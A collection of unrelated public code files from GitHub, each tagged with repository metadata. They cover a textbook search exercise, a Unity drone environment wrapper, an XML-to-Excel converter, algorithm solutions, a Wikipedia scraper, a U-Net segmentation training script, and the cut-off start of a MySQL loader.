    command = 'sphinx-autobuild {0} --port={port} {1} {2}'.format(
        browser_flag, docs_dir, build_dir, port=port)
    ctx.run(command, echo=True, pty=True)
| CenterForOpenScience/COSDev | tasks.py | tasks.py | py | 1,383 | python | en | code | 6 | github-code | 36 |
6942705198 | '''
Complete the following 3 searching problems using techniques
from class and from Ch15 of the textbook website
'''
#1. (7pts) Write code which finds and prints the longest
# word in the provided dictionary. If there are more
# than one longest word, print them all.
import re
def split_line(line):
    """Return the list of words in *line*: runs of letters, optionally
    followed by an apostrophe and more letters (e.g. "don't")."""
    word_pattern = r"[A-Za-z]+(?:'[A-Za-z]+)?"
    return re.findall(word_pattern, line)
#1. Find and print the longest word(s) in the dictionary.
# Uses a context manager so the file is always closed, drops the pointless
# .upper() (case does not change a word's length), and starts from an empty
# list instead of the [" "] sentinel that could leak into the result.
with open("dictionary.txt") as dict_file:
    longest = []
    for line in dict_file:
        for word in split_line(line):
            if not longest or len(word) > len(longest[0]):
                longest = [word]  # new strict maximum: reset the list
            elif len(word) == len(longest[0]):
                longest.append(word)  # tie: keep all longest words
print(longest)
#2. (10pts) Total word count AND average word length in
# "AliceInWonderLand.txt".
# Accumulates the total length and divides once at the end (clearer than
# mutating 'average' in place), guards against an empty file, and uses a
# context manager so the file is always closed.
with open("AliceInWonderLand.txt") as alice:
    word_count = 0
    total_length = 0
    for line in alice:
        for word in split_line(line):
            word_count += 1
            total_length += len(word)
average = total_length / word_count if word_count else 0
print("There are", word_count, "words in Alice in Wonderland")
print("The average word length is:", average)
# CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS
#3 (13pts) How many times do "Cheshire" and "Cat" occur (case-insensitive)
# in "AliceInWonderLand.txt"?
# Upper-cases each word once instead of per comparison, and uses a context
# manager so the file is always closed.
cheshire = 0
cat = 0
with open("AliceInWonderLand.txt") as alice:
    for line in alice:
        for word in split_line(line):
            upper_word = word.upper()
            if upper_word == "CHESHIRE":
                cheshire += 1
            elif upper_word == "CAT":
                cat += 1
print("Cheshire is said", cheshire, "times.")
print("Cat is said", cat, "times.")
# How many times does "Cheshire" immediately followed by "Cat" occur?
# The redundant 'current' variable is dropped (the loop variable already
# holds the current word) and the file is managed with a context manager.
combo = 0
previous = ""
with open("AliceInWonderLand.txt") as alice:
    for line in alice:
        for word in split_line(line):
            if previous.upper() == "CHESHIRE" and word.upper() == "CAT":
                combo += 1
            previous = word
print("Cheshire cat is said", combo, "Times")
#### OR #####
#3 (13pts)Find the most frequently occurring
# seven letter word in "AliceInWonderLand.txt"
# Challenge problem (for fun). What words appear in the text of "Alice in Wonderland" that DO NOT occur in "Alice Through the Looking Glass". Make a list. You can substitute this for any of the above problems.
| ParkerCS/ch15-searches-sdemirjian | ch15ProblemSet.py | ch15ProblemSet.py | py | 2,450 | python | en | code | 0 | github-code | 36 |
9866560419 | from mlagents_envs.environment import UnityEnvironment
from mlagents_envs.environment import ActionTuple
from mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel
import numpy as np
import mlagents.trainers
from collections import namedtuple

# Observation bundle returned by Drone.reset()/step(): the agent's state
# vector, four camera views (front/right/back/left) and raycast data.
obs = namedtuple(
    'obs',
    ['vector', 'front', 'right', 'back', 'left', 'raycast'])
class Drone(object):
    """Gym-style wrapper around a Unity ML-Agents drone environment.

    Exposes reset() and step(action) returning `obs` namedtuples built from
    the first six observation arrays of the first behavior.
    """

    def __init__(self, time_scale=1.0, filename='mac.app', port=11000):
        """Connect to the Unity build at *filename* on worker port *port*
        and apply the engine *time_scale*."""
        self.engine_configuration_channel = EngineConfigurationChannel()
        print(f"VERSION : {mlagents.trainers.__version__}")
        self.env = UnityEnvironment(
            file_name=filename,
            worker_id=port,
            side_channels=[self.engine_configuration_channel])
        self.env.reset()
        # Single-behavior environment: track the first registered behavior.
        self.behavior_name = list(self.env.behavior_specs.keys())[0]
        self.spec = self.env.behavior_specs[self.behavior_name]
        self.engine_configuration_channel.set_configuration_parameters(time_scale=time_scale)
        self.dec, self.term = self.env.get_steps(self.behavior_name)

    def reset(self):
        """Reset the environment and return the initial observation."""
        self.env.reset()
        self.dec, self.term = self.env.get_steps(self.behavior_name)
        self.tracked_agent = -1  # resolved lazily on the first step()
        self.state = [self.dec.obs[i][0] for i in range(6)]
        self.state = obs(
            vector=self.state[0], front=self.state[1],
            right=self.state[2], back=self.state[3],
            left=self.state[4], raycast=self.state[5])
        return self.state

    def step(self, action):
        """Apply *action* (clipped to [-1, 1]) and advance one step.

        Returns (state, reward, done). NOTE(review): on terminal steps the
        previously cached state is returned, not a terminal observation —
        confirm this is intended.
        """
        if self.tracked_agent == -1 and len(self.dec) >= 1:
            self.tracked_agent = self.dec.agent_id[0]
        action = np.clip(action, -1, 1)
        action_tuple = ActionTuple()
        action_tuple.add_continuous(np.array([action]))
        self.env.set_actions(self.behavior_name, action_tuple)
        self.env.step()
        self.dec, self.term = self.env.get_steps(self.behavior_name)
        reward = 0
        done = False
        # Rewards can appear in the decision steps, the terminal steps,
        # or both for the same agent.
        if self.tracked_agent in self.dec:
            reward += self.dec[self.tracked_agent].reward
        if self.tracked_agent in self.term:
            reward += self.term[self.tracked_agent].reward
            done = True
        if done:
            return self.state, reward, done
        self.state = [self.dec.obs[i][0] for i in range(6)]
        self.state = obs(
            vector=self.state[0], front=self.state[1],
            right=self.state[2], back=self.state[3],
            left=self.state[4], raycast=self.state[5])
        return self.state, reward, done
if __name__ == '__main__':
    # Smoke test: drive the environment with random actions forever,
    # printing the observation array shapes and the per-episode score.
    # (The commented-out matplotlib camera-view preview and its unused
    # import were removed as dead code.)
    env = Drone(
        time_scale=0.1,
        filename='/Users/chageumgang/Desktop/baselines/mac.app')
    episode = 0
    while True:
        state = env.reset()
        done = False
        score = 0
        episode += 1
        while not done:
            action = np.random.rand(3)
            next_state, reward, done = env.step(action)
            score += reward
            print(next_state.vector.shape)
            print(next_state.raycast.shape)
            print(next_state.front.shape)
            state = next_state
        print(episode, score)
| chagmgang/baselines | baselines/env/simple_drone.py | simple_drone.py | py | 3,699 | python | en | code | 1 | github-code | 36 |
15006294998 | import pandas as pd
from bs4 import BeautifulSoup as bs
#Create the BeautifulSoup object from an XML file
def get_file(file_name):
    """Read *file_name* and return a BeautifulSoup object parsed as XML."""
    # Context manager guarantees the file handle is closed (the original
    # left it open); read() is equivalent to joining readlines().
    with open(file_name, 'r') as file:
        content = file.read()
    return bs(content, 'xml')
#Collect ancestor names
def get_parents(soup):
    """Return the NAME of every ancestor element that has a NAME attribute
    and contains a TRANSFORMATION tag."""
    return [
        parent["NAME"]
        for parent in soup.parents
        if parent.has_attr("NAME") and parent.find('TRANSFORMATION')
    ]
#Collect values for every element matching a tag
def get_values(soup, tag1):
    """Return [parents, names, descriptions] — three parallel lists, one
    entry per *tag1* element found in *soup*."""
    names = []
    descriptions = []
    parents = []
    # 'element' instead of 'map' to avoid shadowing the builtin.
    for element in soup.find_all(tag1):
        names.append(element.get('NAME'))
        descriptions.append(element.get('DESCRIPTION'))
        parents.append(get_parents(element))
    return [parents, names, descriptions]
#Build a DataFrame from [parents, names, descriptions]
def create_df(list_values):
    """Return a DataFrame with PARENTS/NAME/DESCRIPTION columns built from
    the three parallel lists in *list_values*."""
    data = {  # renamed from 'dict' to avoid shadowing the builtin
        'PARENTS': list_values[0],
        'NAME': list_values[1],
        'DESCRIPTION': list_values[2]
    }
    return pd.DataFrame(data)
#Write a DataFrame to an Excel workbook (the sheet is named after the file)
def create_file(filename, df):
    return df.to_excel(excel_writer=filename, sheet_name=filename, header=True)
#Split the PARENTS list column into separate columns
def transform_column_parents(file):
    """Read the Excel file *file*, split its PARENTS column (a stringified
    Python list) into MAPPING/FOLDER/REPOSITORY — or FOLDER/REPOSITORY when
    the lists only have two entries — and return the combined DataFrame.

    Replaces the original try/except/else flow, whose 'else' branch
    re-concatenated stale frames and which never actually dropped the
    PARENTS column (only 'Unnamed: 0' survived the second overwrite).
    """
    df_origin = pd.read_excel(file)
    # SECURITY: eval() executes arbitrary code from the spreadsheet —
    # only run this on trusted files. It is used because PARENTS holds
    # strings like "['folder', 'repo']".
    list_column = [eval(item) for item in df_origin['PARENTS'].values.tolist()]
    if list_column and len(list_column[0]) == 3:
        column_names = ['MAPPING', 'FOLDER', 'REPOSITORY']
    else:
        column_names = ['FOLDER', 'REPOSITORY']
    df_column = pd.DataFrame(list_column, columns=column_names)
    # Drop both helper columns; errors='ignore' tolerates files without
    # the pandas index column 'Unnamed: 0'.
    df_clean = df_origin.drop(columns=['PARENTS', 'Unnamed: 0'], errors='ignore')
    return pd.concat([df_column, df_clean], axis=1)
if __name__ == '__main__':
    # Source XML and per-tag output workbook names.
    name = '../mapping.XML'
    tag_mapping = 'MAPPING'
    tag_transformation = 'TRANSFORMATION'
    tag_target = 'TARGET'
    tag_source = 'SOURCE'
    filename_mapping = 'mapping.xlsx'
    filename_transformation = 'transformation.xlsx'
    filename_target = 'target.xlsx'
    filename_source = 'source.xlsx'
    # Parse the XML once.
    soup = get_file(name)
    # For each tag type: extract values, build the DataFrame, write Excel.
    list_mapping = get_values(soup, tag_mapping)
    df_mapping = create_df(list_mapping)
    create_file(filename_mapping, df_mapping)
    list_transformation = get_values(soup, tag_transformation)
    df_transformation = create_df(list_transformation)
    create_file(filename_transformation, df_transformation)
    list_target = get_values(soup, tag_target)
    df_target = create_df(list_target)
    create_file(filename_target, df_target)
    list_source = get_values(soup, tag_source)
    df_source = create_df(list_source)
    create_file(filename_source, df_source)
    # Second pass: split the PARENTS column of each workbook.
    # NOTE(review): these read from '../' while the files above are written
    # to the current directory — confirm the intended working directory.
    file1 = '../source.xlsx'
    file2 = '../mapping.xlsx'
    file3 = '../transformation.xlsx'
    file4 = '../target.xlsx'
    # BUG FIX: create_file(filename, df) — the original passed the
    # arguments swapped (create_file(df1, 'source.xlsx')), which crashes
    # because a str has no .to_excel().
    df1 = transform_column_parents(file1)
    create_file('source.xlsx', df1)
    df2 = transform_column_parents(file2)
    create_file('mapping.xlsx', df2)
    df3 = transform_column_parents(file3)
    create_file('transformation.xlsx', df3)
    df4 = transform_column_parents(file4)
    create_file('target.xlsx', df4)
35610933721 | class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
ret = []
if root == None : return ""
q = deque()
q.append(root)
while q :
k = len(q)
for i in range (k):
node = q.popleft()
if node:
ret.append(str(node.val))
q.append(node.left)
q.append(node.right)
else:
ret.append("N")
return ",".join(ret)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
nodes = data.split(",")
if not nodes[0]:
return None
q = deque()
root = TreeNode(nodes[0])
q.append(root)
i = 1
while i < len(nodes[1:]):
if not q :
return root
curnode = q.popleft()
if nodes[i] != "N":
curnode.left = TreeNode(int(nodes[i]))
q.append(curnode.left)
i+=1
if nodes[i] != "N":
curnode.right = TreeNode(int(nodes[i]))
q.append(curnode.right)
i+=1
return root
| is-yusuf/Random-leetcoding- | Iterative serialize.py | Iterative serialize.py | py | 1,418 | python | en | code | 0 | github-code | 36 |
74160129703 | '''
Algorithm: just count how many characters(frequency more than one regard it as one)
'''
#!/bin/python3
import sys
from collections import Counter
def stringConstruction(s):
    """Minimal construction cost equals the number of distinct characters."""
    return len(set(s))
if __name__ == "__main__":
q = int(input().strip())
for a0 in range(q):
s = input().strip()
result = stringConstruction(s)
print(result)
| CodingProgrammer/HackerRank_Python | (Strings)String_Construction(Counter_FK1).py | (Strings)String_Construction(Counter_FK1).py | py | 413 | python | en | code | 0 | github-code | 36 |
947951498 | #!/home/shailja/.virtualenv/my_env/bin/python3
import requests
import bs4
import sys
content = sys.argv[1]
def display_actual_text(text, para_no):
    """Print the visible text of paragraph `para_no` from a list of soup tags.

    Strips style/script/head/title (and document) sub-tags in place before
    extracting the text.
    """
    paragraph = text[para_no]
    for hidden in paragraph(['style', 'script', '[document]', 'head', 'title']):
        hidden.extract()
    print(paragraph.getText())
# Fetch the Wikipedia article page and collect its <p> paragraphs.
wiki_url = 'https://en.wikipedia.org/wiki/{}'
request = requests.get(wiki_url.format(content))
soup = bs4.BeautifulSoup(request.text,'lxml')
actual_text=soup.select('p')
# Handle the case where Wikipedia has no article with this exact name.
try:
    display_actual_text(actual_text,1)
except:
    print(f"Wikipedia does not have an article with this exact name.")
    exit(1)
# wiki_url = 'https://en.wikipedia.org/wiki/Special:Search?go=Go&search={}&ns0=1'
# request = requests.get(wiki_url.format(content))
# soup = bs4.BeautifulSoup(request.text,'lxml')
# #relevant_text=soup.select("div", {"id": "bodyContent"}) #soup.select('#mw-body')
# #relevant_text=relevant_text.select("div.searchresults")
# content = soup.select(".mw-search-result")[0].select('td')[1]
# title=content.a['title']
# relevant_text=content.select(".searchresult")[0]
# [s.extract() for s in relevant_text(['style', 'script', '[document]', 'head', 'title'])]
# visible_text = relevant_text.getText()
# print(title)
# print(visible_text)
# Interactive paging: show one more paragraph per empty input line.
show_next = False
para_no = 2
# Stops (via the except below) when we run past the last paragraph.
try:
    while not show_next:
        show_next = input("!")
        print()
        display_actual_text(actual_text,para_no)
        para_no+=1
except:
    print("End")
| SKT27182/web_scaping | wiki_search.py | wiki_search.py | py | 1,728 | python | en | code | 0 | github-code | 36 |
71592171944 | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import deque
# Complete the bfs function below.
def bfs(n, m, edges, s):
    """Breadth-first distances (edge weight 6) from node s to all others.

    :param n: number of nodes (1-indexed in `edges` and `s`)
    :param m: number of edges (unused; len(edges) is authoritative)
    :param edges: list of [u, v] undirected edges
    :param s: start node
    :return: distances to every node except s, -1 for unreachable nodes
    """
    # Adjacency list, 0-indexed (the original's double comprehension with a
    # range(1) inner loop reduced to exactly this).
    neighbors = [[] for _ in range(n)]
    for e in edges:
        neighbors[e[0] - 1].append(e[1] - 1)
        neighbors[e[1] - 1].append(e[0] - 1)
    # Unvisited nodes keep distance -1.
    seen = [False] * n
    distance = [-1] * n
    seen[s - 1] = True
    distance[s - 1] = 0
    q = deque()
    q.append(s - 1)
    # Removed the leftover debug prints of seen/distance.
    while q:
        v = q.popleft()
        for u in neighbors[v]:
            if not seen[u]:
                distance[u] = distance[v] + 6
                seen[u] = True
                q.append(u)
    return [distance[i] for i in range(n) if i != s - 1]
if __name__ == '__main__':
    # HackerRank harness: read q test cases, run bfs on each, and write the
    # space-separated distances to the OUTPUT_PATH file.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    q = int(input())
    for q_itr in range(q):
        nm = input().split()
        n = int(nm[0])
        m = int(nm[1])
        edges = []
        for _ in range(m):
            edges.append(list(map(int, input().rstrip().split())))
        s = int(input())
        result = bfs(n, m, edges, s)
        fptr.write(' '.join(map(str, result)))
        fptr.write('\n')
fptr.close() | Gabospa/computer_science | bfs.py | bfs.py | py | 1,506 | python | en | code | 0 | github-code | 36 |
16931221429 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 23:39:39 2018
@author: yorklk
"""
import os
import numpy as np
from skimage.morphology import label
from keras.models import Model, load_model
from keras.layers import Input, Activation, Add, BatchNormalization
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv2D, Conv2DTranspose
from keras.layers.pooling import MaxPooling2D
from keras.layers.merge import concatenate
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.applications.mobilenet import MobileNet
import keras.backend as KB
import tensorflow as tf
X_train = np.load('data/X_128.npy')
Y_train = np.load('data/Y_128.npy')
X_test = np.load('data/test_128.npy')
np.random.seed(seed = 71)
epochs = 500
learning_rate = 1e-3
learning_rates = [1e-3]
decay = 5e-5
patience = 15
dropout_rate = 0.015
batch_size = 8
K=4
pre_proc = dict(horizontal_flip = True,
vertical_flip = True,
width_shift_range = 0.1,
height_shift_range = 0.1,
channel_shift_range= 0.0,
zoom_range = 0.0,
rotation_range = 0.0)
####################################################################
# Precision helper function
def precision_at(threshold, iou):
    """Count matches between true and predicted objects at one IoU threshold.

    :param threshold: IoU cutoff; pairs with iou > threshold count as matches
    :param iou: (true_objects, pred_objects) IoU matrix
    :return: (tp, fp, fn) -- true positives, false positives, false negatives
    """
    matches = iou > threshold
    matched_true = np.sum(matches, axis=1) == 1   # true objects hit exactly once
    unmatched_pred = np.sum(matches, axis=0) == 0  # predictions with no true match
    unmatched_true = np.sum(matches, axis=1) == 0  # true objects never predicted
    return np.sum(matched_true), np.sum(unmatched_pred), np.sum(unmatched_true)
def iou_metric(y_true_in, y_pred_in):
    """Mean precision over IoU thresholds 0.5..0.95 for one image pair.

    Connected components of each mask thresholded at 0.5 are treated as
    objects (via skimage.morphology.label); label 0 (background) is
    excluded before computing precision.
    """
    labels = label(y_true_in > 0.5)
    y_pred = label(y_pred_in > 0.5)
    # Object counts include the background label.
    true_objects = len(np.unique(labels))
    pred_objects = len(np.unique(y_pred))
    # Pairwise pixel overlap between every (true, predicted) object pair.
    intersection = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=(true_objects, pred_objects))[0]
    # Compute areas
    area_true = np.histogram(labels, bins = true_objects)[0]
    area_pred = np.histogram(y_pred, bins = pred_objects)[0]
    area_true = np.expand_dims(area_true, -1)
    area_pred = np.expand_dims(area_pred, 0)
    # Compute union (inclusion-exclusion over the broadcast area grids)
    union = area_true + area_pred - intersection
    # Exclude background from the analysis
    intersection = intersection[1:,1:]
    union = union[1:,1:]
    # Avoid division by zero for empty unions.
    union[union == 0] = 1e-9
    # Compute the intersection over union
    iou = intersection / union
    # Average precision over the standard threshold sweep 0.5, 0.55, ..., 0.95.
    prec = []
    for t in np.arange(0.5, 1.0, 0.05):
        tp, fp, fn = precision_at(t, iou)
        if (tp + fp + fn) > 0:
            p = tp / (tp + fp + fn)
        else:
            p = 0
        prec.append(p)
    return np.mean(prec)
def iou_metric_batch(y_true_in, y_pred_in):
    """Average the per-image IoU precision (iou_metric) over a batch."""
    scores = [iou_metric(y_true_in[b], y_pred_in[b])
              for b in range(y_true_in.shape[0])]
    return np.array(np.mean(scores), dtype=np.float32)
def my_iou_metric(label, pred):
    """Metric-style wrapper around iou_metric_batch."""
    return iou_metric_batch(label, pred)
#########################################################################################################
def identity_block(X, filters, dropout_rate):
    """Three stacked conv components, each followed by BN, ELU and dropout.

    :param X: input tensor
    :param filters: (F1, F2, F3) filter counts for the 3x3, 3x3 and 1x1 convs
    :param dropout_rate: dropout applied after every activation
    :return: transformed tensor (same spatial size as the input)
    """
    F1, F2, F3 = filters
    components = [
        (F1, (3, 3), 'same'),
        (F2, (3, 3), 'same'),
        (F3, (1, 1), 'valid'),
    ]
    for n_filters, kernel, pad in components:
        X = Conv2D(n_filters, kernel, strides=(1, 1), padding=pad)(X)
        X = BatchNormalization(axis=3)(X)
        X = Activation('elu')(X)
        X = Dropout(rate=dropout_rate)(X)
    return X
def deconvolution_block(X, filters, dropout_rate):
    """ResNet-style 2x upsampling block.

    Main path: 2x2 transposed conv, then 3x3 and 1x1 convs (each with BN);
    shortcut path: a single 2x2 transposed conv with BN. The two paths are
    summed, activated with ELU and passed through dropout.
    """
    F1, F2, F3 = filters
    shortcut_in = X
    # Main path: upsample ...
    main = Conv2DTranspose(F1,
                           (2, 2),
                           strides=(2, 2),
                           padding='same')(X)
    main = BatchNormalization(axis=3)(main)
    main = Activation('elu')(main)
    main = Dropout(rate=dropout_rate)(main)
    # ... then a 3x3 conv component ...
    main = Conv2D(F2, (3, 3), strides=(1, 1), padding='same')(main)
    main = BatchNormalization(axis=3)(main)
    main = Activation('elu')(main)
    main = Dropout(rate=dropout_rate)(main)
    # ... and a 1x1 projection (no activation before the merge).
    main = Conv2D(F3, (1, 1), strides=(1, 1), padding='valid')(main)
    main = BatchNormalization(axis=3)(main)
    # Shortcut path: upsample to the same shape and filter count.
    shortcut = Conv2DTranspose(F3,
                               (2, 2),
                               strides=(2, 2),
                               padding='same')(shortcut_in)
    shortcut = BatchNormalization(axis=3)(shortcut)
    # Merge, activate, regularize.
    merged = Add()([shortcut, main])
    merged = Activation('elu')(merged)
    return Dropout(rate=dropout_rate)(merged)
def uNet_Model(input_shape = (128, 128, 3), dropout_rate = dropout_rate):
    '''
    uNet with MobileNet (pretrained on imagenet) as downsampling side
    Outputs saved from five layers to concatenate on upsampling side:
        activations at conv_pw_1, conv_pw_3, conv_pw_5, conv_pw_11, conv_pw_13
    ResNet convolution blocks with Conv2DTranspose and elu used for upsampling side
    '''
    # Fix: use the input_shape parameter (it was previously ignored in favor
    # of a hard-coded (128, 128, 3)); the default is unchanged.
    base_model = MobileNet(weights = 'imagenet',
                           include_top = False,
                           input_shape = input_shape)
    # Base model, with 5 layers out (resolutions assume a 128x128 input)
    X1 = base_model.get_layer('conv_pw_1_relu').output # 64x64, 64 filters
    X2 = base_model.get_layer('conv_pw_3_relu').output # 32x32, 128 filters
    X3 = base_model.get_layer('conv_pw_5_relu').output # 16x16, 256 filters
    X4 = base_model.get_layer('conv_pw_11_relu').output # 8x8, 512 filters
    X5 = base_model.get_layer('conv_pw_13_relu').output # 4x4, 1024 filters
    # Bottom block
    X = identity_block(X5, filters = [256, 256, 1024], dropout_rate = dropout_rate) # 4x4
    X = Add()([X, X5]) # 4x4
    # Deconvolution block 1
    X = deconvolution_block(X, filters = [128, 128, 512], dropout_rate = dropout_rate) # 8x8
    X = Add()([X, X4]) # 8x8
    # Deconvolution block 2
    X = deconvolution_block(X, filters = [64, 64, 256], dropout_rate = dropout_rate) # 16x16
    X = Add()([X, X3]) # 16x16
    # Deconvolution block 3
    X = deconvolution_block(X, filters= [32, 32, 128], dropout_rate = dropout_rate) # 32x32
    X = Add()([X, X2]) # 32x32
    # Deconvolution block 4
    X = deconvolution_block(X, filters = [16, 16, 64], dropout_rate = dropout_rate) # 64x64
    X = Add()([X, X1]) # 64x64
    # Final deconvolution block
    X = deconvolution_block(X, filters = [16, 16, 64], dropout_rate = dropout_rate) # 128x128
    predictions = Conv2D(1, (1, 1), activation='sigmoid')(X)
    # Fix: Keras 2.x uses the plural `inputs`/`outputs` keywords; the
    # singular forms are deprecated and removed in later versions.
    model = Model(inputs = base_model.input, outputs = predictions)
    return model
#####################################################################################################
def train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size, train_generator, file_path):
    """Build and train one uNet fold; checkpoints the best dev-loss weights
    to file_path and stops early when val_loss stops improving.
    NOTE: `epochs` is read from module scope, not from `parameters`.
    """
    # Train model using Adam optimizer and early stopping
    model = uNet_Model(input_shape=(128, 128, 3), dropout_rate = parameters['dropout_rate'])
    model.compile(loss='binary_crossentropy',
                  optimizer=Adam(lr = parameters['learning_rate'], decay = parameters['decay']),
                  metrics=['accuracy'])
    model.fit_generator(generator = train_generator,
                        steps_per_epoch = int(X_train_cv.shape[0]/batch_size),
                        epochs = epochs,
                        shuffle = True,
                        verbose = 2,
                        validation_data = (X_dev, Y_dev),
                        validation_steps = int(X_train_cv.shape[0]/batch_size),
                        callbacks = [EarlyStopping('val_loss', patience=parameters['patience'], mode="min"),
                                     ModelCheckpoint(file_path, save_best_only=True)])
    return model
def get_folds(X_train, Y_train, K):
    """Shuffle the data once, then return K [X_train, Y_train, X_dev, Y_dev]
    folds for cross-validation (fold j uses rows j*m//K .. (j+1)*m//K as dev).
    """
    m = X_train.shape[0]
    order = np.random.permutation(m)
    X_shuffled = X_train[order, :, :, :]
    Y_shuffled = Y_train[order, :, :, :]
    fold_length = int(m / K)
    folds = []
    for j in range(K):
        dev_idx = list(range(j * fold_length, (j + 1) * fold_length))
        train_idx = list(range(0, j * fold_length)) + list(range((j + 1) * fold_length, m))
        folds.append([
            X_shuffled[train_idx, :, :, :],
            Y_shuffled[train_idx, :, :, :],
            X_shuffled[dev_idx, :, :, :],
            Y_shuffled[dev_idx, :, :, :],
        ])
    return folds
def get_file_path(j, parameters, directory):
    """Announce the fold being trained and return its checkpoint path,
    creating `directory` if it does not exist yet."""
    print('\nFold:\t{}\nlearning_rate:\t{learning_rate}\ndropout_rate:\t{dropout_rate}\naugmentation:\t{aug}'.format(str(j), **parameters))
    os.makedirs(directory, exist_ok=True)
    return directory + '/weights_' + str(j) + '.hdf5'
def rename_weight_path(j, metrics, file_path, directory):
    """Report a fold's metrics and rename its checkpoint so the filename
    embeds the dev loss and IoU."""
    print('\nFold:\t{}\nTrain Loss:\t{train_loss:.4}\nDev Loss:\t{dev_loss:.4}\nMean IoU:\t{IoU:.4}\n'.format(str(j), **metrics))
    tagged = '{}_{}_{dev_loss:.4}_{IoU:.4}{hdf5}'.format('/weights', str(j), **metrics)
    os.rename(file_path, directory + tagged)
def print_final_metrics(parameters, metrics, directory):
    """Print the cross-validation summary and tag the run directory name
    with the averaged dev loss and IoU."""
    print('\n\nlearning_rate: {learning_rate}\ndropout_rate: {dropout_rate}\naugmentation: {aug}'.format(**parameters))
    print('avg_dev_loss:\t{avg_dev_loss}\nmean_IoU:\t{IoU_log}\n\n\n'.format(**metrics))
    summary = 'loss={avg_dev_loss:.6}_IoU={IoU_log:.6}'.format(**metrics)
    os.rename(directory, directory + '--' + summary)
def get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics):
    """Evaluate a trained fold and fold its scores into `metrics`.

    Mutates (and returns) the shared `metrics` dict: per-fold train/dev loss
    and IoU are overwritten, while avg_dev_loss and IoU_log accumulate the
    running means across the K folds.
    """
    # Load the best model weights saved by early stopping
    K = metrics['K']
    model.load_weights(filepath=file_path)
    # Get train and dev loss
    train_eval = model.evaluate(X_train_cv, Y_train_cv, verbose=0)
    metrics['train_loss'] = train_eval[0]
    dev_eval = model.evaluate(X_dev, Y_dev, verbose=0)
    metrics['dev_loss'] = dev_eval[0]
    metrics['avg_dev_loss'] += metrics['dev_loss']/K
    # Get Intersection over Union (predictions binarized at 0.5)
    preds_dev = model.predict(X_dev)
    Y_pred = preds_dev >= 0.5
    Y_true = Y_dev
    IoU = my_iou_metric(Y_true, Y_pred)
    metrics['IoU'] = IoU
    metrics['IoU_log'] += IoU/K
    return metrics
############################################################################
# Hyperparameter sweep: one K-fold cross-validation run per learning rate.
for learning_rate in learning_rates:
    # Build an "aug" tag describing the active augmentations for the run dir.
    # NOTE(review): each format call passes `aug` as the positional argument
    # and an unused 'shift'/'zoom'/... literal -- the resulting tags look like
    # "_=0.1" rather than "_shift=0.1"; confirm whether the label was intended.
    aug = ''
    if pre_proc['width_shift_range'] != 0.0:
        aug += '_{}={width_shift_range}'.format(aug, 'shift', **pre_proc)
    if pre_proc['zoom_range'] != 0.0:
        aug += '_{}={zoom_range}'.format(aug, 'zoom', **pre_proc)
    if pre_proc['rotation_range'] != 0.0:
        aug += '_{}={rotation_range}'.format(aug, 'rotation', **pre_proc)
    if pre_proc['horizontal_flip']:
        aug += '_{}={horizontal_flip}'.format(aug, 'h-flip', **pre_proc)
    if pre_proc['vertical_flip']:
        aug += '_{}={vertical_flip}'.format(aug, 'v-flip', **pre_proc)
    parameters = {'learning_rate':learning_rate, 'dropout_rate':dropout_rate, 'aug':aug, 'decay':decay, 'patience':patience}
    directory = 'model_5/{learning_rate}_{dropout_rate}/{aug}'.format(**parameters)
    metrics = {'train_loss': 0, 'dev_loss': 0, 'avg_dev_loss': 0, 'IoU': 0, 'IoU_log': 0, 'K': K,
               'hdf5': '.hdf5'}
    # Create image and mask data generators for preprocessing; images and
    # masks share identical augmentation settings so they stay aligned.
    image_datagen = ImageDataGenerator(**pre_proc)
    mask_datagen = ImageDataGenerator(**pre_proc)
    image_datagen.fit(X_train, augment = True)
    mask_datagen.fit(Y_train, augment = True)
    image_generator = image_datagen.flow(X_train,
                                         batch_size = batch_size)
    mask_generator = mask_datagen.flow(Y_train,
                                       batch_size = batch_size)
    train_generator = zip(image_generator, mask_generator)
    # Create folds and train; metrics accumulates across folds.
    folds = get_folds(X_train, Y_train, K)
    for j in range(K):
        X_train_cv = folds[j][0]
        Y_train_cv = folds[j][1]
        X_dev = folds[j][2]
        Y_dev = folds[j][3]
        file_path = get_file_path(j, parameters, directory)
        model = train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size,
                           train_generator, file_path)
        metrics = get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics)
        rename_weight_path(j, metrics, file_path, directory)
    print_final_metrics(parameters, metrics, directory)
| yorklk/dsb2018-U-Net | U-Net.py | U-Net.py | py | 13,208 | python | en | code | 0 | github-code | 36 |
13988415228 | # kinda lame, this was supposedly done in logarithmic time, though did not
# get totally rt the trick
class Solution:
    def getNoZeroIntegers(self, n: int) -> List[int]:
        """Split n into a pair (a, b) with a + b == n where neither number
        contains the digit 0, preferring the largest possible first value."""
        a = n - 1
        while a > 0:
            pair = (a, n - a)
            if '0' not in str(pair[0]) and '0' not in str(pair[1]):
                return pair
            a -= 1
| dariomx/topcoder-srm | leetcode/trd-pass/easy/convert-integer-to-the-sum-of-two-no-zero-integers/convert-integer-to-the-sum-of-two-no-zero-integers.py | convert-integer-to-the-sum-of-two-no-zero-integers.py | py | 354 | python | en | code | 0 | github-code | 36 |
9157699619 | import argparse
from typing import List
import config
import mysql.connector
from collections import OrderedDict
from binance_data import BinanceData
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
def load(data: List['BinanceData']):
    """Batch-insert transformed candles into binance_transformed_data.

    Opens a fresh MySQL connection, runs a single executemany insert for the
    whole batch, commits, and closes the connection.
    """
    cnx = mysql.connector.connect(
        host=config.host,
        user=config.user,
        password=config.passwd,
        database="binance_transformed_data")
    cursor = cnx.cursor()
    insert_statement = (
